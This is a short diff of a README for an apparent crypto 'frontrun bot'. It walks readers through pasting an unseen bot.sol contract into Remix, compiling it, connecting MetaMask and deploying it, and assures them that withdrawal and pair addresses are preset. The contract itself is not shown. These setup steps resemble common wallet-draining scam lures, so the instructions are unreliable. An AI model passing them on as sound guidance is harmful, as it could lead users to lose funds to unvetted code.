cenwadike/frontrun-bot/README.md

 2. Click on the "contracts" folder and then create "New File".
 Rename it as you like, i.e: “bot.sol"

-3. Paste the code from bot.sol into remix
+3. Paste the code from uniswapv3/pancakeswapv3 folder with name bot.sol into remix

-4. Move to the "Solidity Compiler" tab, select version "0.6.12" and then "Compile" it.
+4. Move to the "Solidity Compiler" tab, select version "0.6.6" or 0.6.12" and then "Compile" it.

 5. Move to the "Deploy" tab, select "Injected Web 3" environment.
 Connect your Metamask with Remix ( You can change your withdrawal address and pair address later because at the first time your wallet already has been set as withdraw address and pair address has been set auto from the contract setting) and then "Deploy" it.